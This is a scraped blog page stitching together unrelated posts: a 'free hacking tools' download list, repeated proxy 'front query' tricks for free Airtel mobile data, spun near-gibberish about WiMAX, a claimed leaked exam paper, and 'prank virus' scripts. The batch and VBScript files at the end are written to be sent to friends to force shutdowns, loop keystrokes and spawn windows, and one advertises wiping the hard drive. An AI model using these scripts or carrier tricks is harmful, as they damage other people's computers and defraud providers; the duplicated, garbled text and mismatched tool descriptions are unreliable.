Websitehttp://3d2f.com/programs/0-545-pc-activity-monitor-pro-download.shtml
Download Pagehttp://download.softsecurity.com/5/6/pca_pro.zip
File size1192 kb
LicenseShareware
Operating SystemWindows 95, Windows 98, Windows ME, Windows NT, Windows 2000, Windows XP


6. Cain & Abel
Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of several kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols.
hack
Cain & Abeldownload
Websitehttp://www.oxid.it/cain.html
Download Pagehttp://www.oxid.it/cain.html
File size660 KB
LicenseFreeware
Operating SystemWindows iNT/2000/XP


7. SpyRemover Pro 3.05

SpyRemover detects and removes more than 140.000 intrusive devices such as spyware, adware, hijackers, keyloggers, Trojans, tracking devices, hacker tools, and other spy devices on your PC. This spyware remover is powerful and easy to use.

SpyRemoverdownload
Websitehttp://3d2f.com/programs/6-183-spyremover-pro-download.shtml
Download Pagehttp://www.itcompany.com/remover.exe
File size6172 kb
LicenseShareware
Operating SystemWindows 95, Windows 98, Windows ME, Windows NT, Windows 2000, Windows XP, Windows 2003, Windows Vista


8. Nikto
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3500 potentially dangerous files/CGIs, versions on over 900 servers, and version specific problems on over 250 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).
Niktodownload
Websitehttp://www.cirt.net/nikto2
Download Pagehttp://www.cirt.net/nikto2
File size390 kb
LicenseFreeware


9. SuperScan
SuperScan is an user-friendly tool for cleaning the junk files.Only click your mouse, it clean all the junk files quickly and safely.

hacking tools
SuperScandownload
Websitehttp://www.snapfiles.com/publishers/foundstone-inc/index.html
Download Pagehttp://www.snapfiles.com/download/dlsuperscan.html
File size196 kb
LicenseFreeware
Operating SystemWindows 2000/XP


10. Yersinia
Yersinia is a network tool designed to take advantage of some weakeness in different network protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems.
hacking tools
Yersiniadownload
Websitehttp://www.yersinia.net/
Download Pagehttp://www.yersinia.net/download.htm



11. PuTTY

PuTTY is an SSH client port to the Nokia 9200 Communicator series. The current version contains basic SSH protocol support, terminal emulation, and a bare-bones user interface.

PuTTYdownload
Websitehttp://www.chiark.greenend.org.uk/~sgtatham/putty/
Download Pagehttp://www.chiark.greenend.org.uk/~sgtatham/putty/download.html
File size196 kb
LicenseFreeware
Operating SystemWindows 2000/XP


12. Nessus
The Nessus is vulnerability scanner, featuring high speed discovery, configuration auditing, asset profiling, sensitive data discovery and vulnerability analysis of your security posture. Nessus scanners can be distributed throughout an entire enterprise, inside DMZs, and across physically separate networks.
hacking tools
Nessusdownload
Websitehttp://www.nessus.org/nessus/
Download Pagehttp://www.nessus.org/download/
File size26.51MB
LicenseFreeware


13. Hping
Hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping(8) unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.
Hpingdownload
Websitehttp://www.hping.org//
Download Pagehttp://www.hping.org/download.php
LicenseFreeware
Operating SystemLinux, FreeBSD, NetBSD, OpenBSD, Solaris, MacOs X, Windows


14. coWPAtty
coWPAtty is designed to audit the security of pre-shared keys selected in WiFi Protected Access (WPA) networks.

coWPAttydownload
Websitehttp://wirelessdefence.org/Contents/coWPAttyMain.html
Download Pagehttp://sourceforge.net/project/downloading.php?group_id=123588&use_mirror=freefr&filename=cowpatty-2.0.tgz&a=31536266
LicenseFreeware


15. DumpAutoComplete v0.7
This application will search for the default Firefox profile of the user who runs the tool and dump the AutoComplete cache in XML format to standard output. Alternatively, autocomplete files can be passed to the application and they will be parsed as well. This application understands mork based autocomplete files (Firefox 1.x) as well as SQLite based formhistory and webappsstore files (Firefox 2.x).
DumpAutoComplete v0.7download
Websitehttp://www.foundstone.com/us/resources/proddesc/dumpautocomplete.htm
Download Pagehttp://www.foundstone.com/us/resources/termsofuse.asp?file=dumpautocomplete.zip
LicenseFreeware

Source: http://hackspc.com/free-hacking-tools/

BROWSE FREE THROUGH HANDLER UC WITH DOWNLOAD SUPPORT. HIGH SPEED BROWSING EVER WITH FULL SPEED FREE DOWNLOAD. UC HANDLER FOR FAST AND FREE BROWSING ON AIRTEL USING MOBILE OFFICE SETTINGS

BROWSE FREE THROUGH HANDLER UC WITH DOWNLOAD SUPPORT. HIGH SPEED BROWSING EVER WITH FULL SPEED FREE DOWNLOAD. UC HANDLER FOR FAST AND FREE BROWSING ON AIRTEL USING MOBILE OFFICE SETTINGS

http://www.zoomwap.com/download-471-dba278f223953ca8492d/uc_browser_7_4_handler_%28zoomwap.com%29.jar

USE THE FRONT QUERY
0.facebook.com.gowingo.com/cgi-bin/nph-get.cgi/000001A/http/

COPY THIS TO FRONT QUERY

THEN CHOOSE MOBILE OFFICE SETTINGS
THE HACK IS DONE
BROWSE AND DOWNLOAD AS MUCH AS YOU CAN

BROWSE FREE THROUGH HANDLER UC WITH DOWNLOAD SUPPORT. HIGH SPEED BROWSING EVER WITH FULL SPEED FREE DOWNLOAD. UC HANDLER FOR FAST AND FREE BROWSING ON AIRTEL USING MOBILE OFFICE SETTINGS

BROWSE FREE THROUGH HANDLER UC WITH DOWNLOAD SUPPORT. HIGH SPEED BROWSING EVER WITH FULL SPEED FREE DOWNLOAD. UC HANDLER FOR FAST AND FREE BROWSING ON AIRTEL USING MOBILE OFFICE SETTINGS

http://www.zoomwap.com/download-471-dba278f223953ca8492d/uc_browser_7_4_handler_%28zoomwap.com%29.jar

USE THE FRONT QUERY
0.facebook.com.gowingo.com/cgi-bin/nph-get.cgi/000001A/http/

COPY THIS TO FRONT QUERY

THEN CHOOSE MOBILE OFFICE SETTINGS
THE HACK IS DONE
BROWSE AND DOWNLOAD AS MUCH AS YOU CAN

Difference Between Wimax and Wifi ?

The humankind comprehensive web, it's no occurrence that group conceptualise it increasingly sticky to fix up with things and image out which the patronizing options actually are. For those who are curious in being obstructed in faster and outstrip but who are a small bit unsure most whether or not they should vest in next-level options, there is truly no saneness to livelihood using the old-world methods for getting online, especially as far as versatile connections are involved. Whether employed, studying, or but poking near the web, here are quintuplet reasons to make stressful line distance. No searching for a residence to get online, no stressing some whether or not the hotel is feat to acquire a allegretto sufficiency connection, and no relying on word center Wi-Fi are conscionable troika of the loads of reasons that sector travelers should upgrade faster than most. It means everything from easier commutes to easier abstraction preparing chief presentations, and is definitely the incomparable way to get things realized.

Schools
Mumbai
Colleges
Sports
Noida

2 - Facility delays that are not totally mind-numbing. State cragfast in airports or teach stations is a lot little of a problem when there is a way to inform friends and to let tribe members and bosses copulate just when one's achievement is actually achievement to be set. It's definitely the unsurpassable getable way to be connecting for issue, too.

4 - No author resistance elbows with others poaching wireless net in cafes. It can be fun to be newborn and skint and relying on autonomous Wi-Fi, or it can fitting be a minuscule bit trying and depressing. For those who are displeased of state sequestered in tiny cafes that substance up the possibleness to get online for supply, having something cheap that goes anywhere agency not having to go downwardly that course again.

SSLC MARCH 2011 EXAMINATION MATHS QUESTION PAPER LEAKED. 2 MATHS QUESTIONS OUT GET IT HERE

SSLC EXAM 2011 MATHS QUESTION PAPER ( MARCH 2011 ) PUPIC QUESTION PAPER STEALED

EXPLODING ALL THE QUESTION IS NOT RIGHT I AM GOING TO TELL TO TWO QUESTS OF MARCH 2011 UNRELEASED

QUESTION 1 :
(i) PROVE
PA x PB = PC x PD ?
(ii) -------- (CAN'T BE TOLDED)
(4 MARKS)
QUESTION 2 :
A HEMISPHERE OF RADIUS 5cm IS FITTED WITH A CONE. TOTAL LENGHT OF THE SOLID IS 11cm
(i) FIND THE VOLUME OF THE SOLID
(ii) --------------- ( CAN'T BE TOLDED )
(iii) -------------- ( ;; )

PLEASE COMMENT
THE SSLC MARCH 2011 EXAMINATION

not sure about this questions

SSLC MARCH 2011 EXAMINATION MATHS QUESTION PAPER LEAKED. 2 MATHS QUESTIONS OUT GET IT HERE

SSLC EXAM 2011 MATHS QUESTION PAPER ( MARCH 2011 ) PUPIC QUESTION PAPER STEALED

EXPLODING ALL THE QUESTION IS NOT RIGHT I AM GOING TO TELL TO TWO QUESTS OF MARCH 2011 UNRELEASED

QUESTION 1 :
(i) PROVE
PA x PB = PC x PD ?
(ii) -------- (CAN'T BE TOLDED)
(4 MARKS)
QUESTION 2 :
A HEMISPHERE OF RADIUS 5cm IS FITTED WITH A CONE. TOTAL LENGHT OF THE SOLID IS 11cm
(i) FIND THE VOLUME OF THE SOLID
(ii) --------------- ( CAN'T BE TOLDED )
(iii) -------------- ( ;; )

PLEASE COMMENT
THE SSLC MARCH 2011 EXAMINATION

not sure about this questions

SSLC EXAM TIME TABLE 2011

SSLC Exam Time table 2011

March14 – 1.45pm to 3.30pm -  First Language Part 1 [Malayalam]

March15 – 1.45pm to 3.30pm -  First Language Part 2 [Malayalam Part II]

March16 – 1.45pm to 3.30pm -  Second Language –English

March17 – 1.45pm to 3.30pm -  Third Language – Hindi/General Knowledge

March19 – 1.45pm to 3.30pm -  Physics

March21 – 1.45pm to 4.30pm -  Mathematics

March22 – 1.45pm to 3.30pm -  Chemistry

March23 – 1.45pm to 3.30pm -  Information Technology (IT)

March24 – 1.45pm to 4.30pm -  Social Science

March26 – 1.45pm to 3.30pm -  Biology

SSLC EXAM TIME TABLE 2011

SSLC Exam Time table 2011

March14 – 1.45pm to 3.30pm -  First Language Part 1 [Malayalam]

March15 – 1.45pm to 3.30pm -  First Language Part 2 [Malayalam Part II]

March16 – 1.45pm to 3.30pm -  Second Language –English

March17 – 1.45pm to 3.30pm -  Third Language – Hindi/General Knowledge

March19 – 1.45pm to 3.30pm -  Physics

March21 – 1.45pm to 4.30pm -  Mathematics

March22 – 1.45pm to 3.30pm -  Chemistry

March23 – 1.45pm to 3.30pm -  Information Technology (IT)

March24 – 1.45pm to 4.30pm -  Social Science

March26 – 1.45pm to 3.30pm -  Biology

Front query for AIRTEL UC HANDLERS AND OPERA HANDLERS

LATEST FRONT QUERIES FOR AIRTEL FREE GPRS MO TRICKS 2010!
Phone Proxy Settings:
Proxy IP: zerolike.comor75.102.25.167
Port: 80
Front Query:http://wap.mauj.com/cgiproxy/[nofollow]Phone Proxy Settings:Proxy IP: venus.wsb-nlu.edu.pl or195.205.100.200
Port: 80
Front Query:http://wap.mauj.com/~mbar3/[nofollow]net/nph-proxy.cgi/010110A/http/Phone Proxy Settings:Proxy IP: uploader.ru or 217.65.12.26
Port: 80
Front Query:http://wap.mauj.com/cgi-bin/[nofollow]proxy/nph-proxy.cgi/0/http/
Phone Proxy Settings:
Proxy IP: obmem.comor70.40.213.103
Port: 80
Front Query:http://wap.mauj.com/cgi-bin/[nofollow]nph-proxy.cgi/010100A/http/
Phone Proxy Settings:
Proxy IP: uvirtual.dpicuto.edu.bo or
Front Query:http://wap.mauj.com/cgi-bin/[nofollow]nph-proxy.cgi/000000A/http/
Phone Proxy Settings:
Proxy IP: torproxy.netor188.40.82.50
Port: 80
Front Query:http://wap.mauj.com/[nofollow]1. You can use these front queries in modded,handler versions of opera mini 4.2,opera mini 5.1,nimbuzz,migg33,ucweb7.1 e.t.c2.No balance restrictions3.Use your default Mobile office or Airtel live settings to enjoyairtel free browsing&downloading in airtel

Front query for AIRTEL UC HANDLERS AND OPERA HANDLERS

LATEST FRONT QUERIES FOR AIRTEL FREE GPRS MO TRICKS 2010!
Phone Proxy Settings:
Proxy IP: zerolike.comor75.102.25.167
Port: 80
Front Query:http://wap.mauj.com/cgiproxy/[nofollow]Phone Proxy Settings:Proxy IP: venus.wsb-nlu.edu.pl or195.205.100.200
Port: 80
Front Query:http://wap.mauj.com/~mbar3/[nofollow]net/nph-proxy.cgi/010110A/http/Phone Proxy Settings:Proxy IP: uploader.ru or 217.65.12.26
Port: 80
Front Query:http://wap.mauj.com/cgi-bin/[nofollow]proxy/nph-proxy.cgi/0/http/
Phone Proxy Settings:
Proxy IP: obmem.comor70.40.213.103
Port: 80
Front Query:http://wap.mauj.com/cgi-bin/[nofollow]nph-proxy.cgi/010100A/http/
Phone Proxy Settings:
Proxy IP: uvirtual.dpicuto.edu.bo or
Front Query:http://wap.mauj.com/cgi-bin/[nofollow]nph-proxy.cgi/000000A/http/
Phone Proxy Settings:
Proxy IP: torproxy.netor188.40.82.50
Port: 80
Front Query:http://wap.mauj.com/[nofollow]1. You can use these front queries in modded,handler versions of opera mini 4.2,opera mini 5.1,nimbuzz,migg33,ucweb7.1 e.t.c2.No balance restrictions3.Use your default Mobile office or Airtel live settings to enjoyairtel free browsing&downloading in airtel
LATEST FRONT QUERIES FOR AIRTEL FREE GPRS MO TRICKS 2010!
Phone Proxy Settings:
Proxy IP: zerolike.comor75.102.25.167
Port: 80
Front Query:http://wap.mauj.com/cgiproxy/[nofollow]Phone Proxy Settings:Proxy IP: venus.wsb-nlu.edu.pl or195.205.100.200
Port: 80
Front Query:http://wap.mauj.com/~mbar3/[nofollow]net/nph-proxy.cgi/010110A/http/Phone Proxy Settings:Proxy IP: uploader.ru or 217.65.12.26
Port: 80
Front Query:http://wap.mauj.com/cgi-bin/[nofollow]proxy/nph-proxy.cgi/0/http/
Phone Proxy Settings:
Proxy IP: obmem.comor70.40.213.103
Port: 80
Front Query:http://wap.mauj.com/cgi-bin/[nofollow]nph-proxy.cgi/010100A/http/
Phone Proxy Settings:
Proxy IP: uvirtual.dpicuto.edu.bo or
Front Query:http://wap.mauj.com/cgi-bin/[nofollow]nph-proxy.cgi/000000A/http/
Phone Proxy Settings:
Proxy IP: torproxy.netor188.40.82.50
Port: 80
Front Query:http://wap.mauj.com/[nofollow]1. You can use these front queries in modded,handler versions of opera mini 4.2,opera mini 5.1,nimbuzz,migg33,ucweb7.1 e.t.c2.No balance restrictions3.Use your default Mobile office or Airtel live settings to enjoyairtel free browsing&downloading in airtel
LATEST FRONT QUERIES FOR AIRTEL FREE GPRS MO TRICKS 2010!
Phone Proxy Settings:
Proxy IP: zerolike.comor75.102.25.167
Port: 80
Front Query:http://wap.mauj.com/cgiproxy/[nofollow]Phone Proxy Settings:Proxy IP: venus.wsb-nlu.edu.pl or195.205.100.200
Port: 80
Front Query:http://wap.mauj.com/~mbar3/[nofollow]net/nph-proxy.cgi/010110A/http/Phone Proxy Settings:Proxy IP: uploader.ru or 217.65.12.26
Port: 80
Front Query:http://wap.mauj.com/cgi-bin/[nofollow]proxy/nph-proxy.cgi/0/http/
Phone Proxy Settings:
Proxy IP: obmem.comor70.40.213.103
Port: 80
Front Query:http://wap.mauj.com/cgi-bin/[nofollow]nph-proxy.cgi/010100A/http/
Phone Proxy Settings:
Proxy IP: uvirtual.dpicuto.edu.bo or
Front Query:http://wap.mauj.com/cgi-bin/[nofollow]nph-proxy.cgi/000000A/http/
Phone Proxy Settings:
Proxy IP: torproxy.netor188.40.82.50
Port: 80
Front Query:http://wap.mauj.com/[nofollow]1. You can use these front queries in modded,handler versions of opera mini 4.2,opera mini 5.1,nimbuzz,migg33,ucweb7.1 e.t.c2.No balance restrictions3.Use your default Mobile office or Airtel live settings to enjoyairtel free browsing&downloading in airtel

Artav Antivirus Ternyata Tidak Original

Pernyataan minta maaf 

    Ya seperti ini akibatnya kalau sudah terlanjur basah, ya sudah minta maaf atau ucapan terima kasih yang harus dihaturkan karena sudah membajak sebagian atau istilah halusnya pinjam dulu dan terus minta ijin belakangan. Maklumlah masih bocah SMP, belum tahu akibat yang timbul jika salah langkah. Seperti yang kami kutip dari situs Artav Antivirus dan juga detik.com, bahwa sang bocah (Arrival Dwi Sentosa) yang jago buat Anti Virus sendiri tanpa bantuan siapapun, terpaksa harus mengakui kekeliruan yang telah dibuatnya, karena telah meminjam paksa beberapa komponen dari AL Anti virus milik bapak Moh Aly Shodiqin.

         Seperti yang kami kutip dari situs detik.com, bahwa sang pemilik Al Antivirus tidak merasa keberatan jika karyanya 'dipinjam'.  "Nasi sudah menjadi bubur mau gimana lagi? Yang penting bisa bermanfaat bagi semua orang aku udah senang dan bangga kok dengan Ival," ujar Shodiqin. Adapun fitur yang dipinjam paksa oleh Artav Antivirus seperti sistem notifikasi, sistem scanning, quarantine, dan registry tweak. Jika anda penasaran dengan Al Antivirus yang merupakan Anti virus open source, dengan source kode yang menggunakan bahasa visul basic versi  VB 6.0.  Dapat di download disini.


          Lebih lanjut pak Shodiqin mengatakan bahwa, "Sekarang yang terpenting adalah mensupport Ival supaya bisa terus berkarya dan memajukan IT kita, jangan sampai mentalnya down. Kasian juga kan," pungkas Shodiqin, kepada detikINET, Kamis (17/2/2011).

 
          Ya buat Ival sendiri yang terpenting teruslah berkarya, jangan putus asa dan jangan lupa untuk menghargai hasil karya orang lain, agar supaya hasil karya kita dihargai pula oleh orang banyak.
           Adapun tampilan Al Antivirus seperti berikut ini :

 

 

Freaking Your Friends With Harmless Computer Virus | Can ByPass Antivirus

Hi! This is Anshuman kak again with new hack and cracks ...........☺☻



1) Convey your friend a little message and shut down his / her computer:

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it.

2) Toggle your friend's Caps Lock button simultaneously:

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save it as "Anything.VBS" and send it.

3) Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save it as "Anything.VBS" and send it.

4) Frustrate your friend by making this VBScript hit Enter simultaneously:

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.

5) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "

Save it as "Anything.VBS" and send it.

6) Frustrate your friend by making this VBScript hit Backspace simultaneously:

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Save it as "Anything.VBS" and send it.

7) Hack your friend's keyboard and make him type "You are a fool" simultaneously:

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Save it as "Anything.VBS" and send it.

8. Open Notepad continually in your friend's computer:

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as "Anything.BAT" and send it.

9) Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:


1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown

@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

Save it as "Anything.BAT" and send it.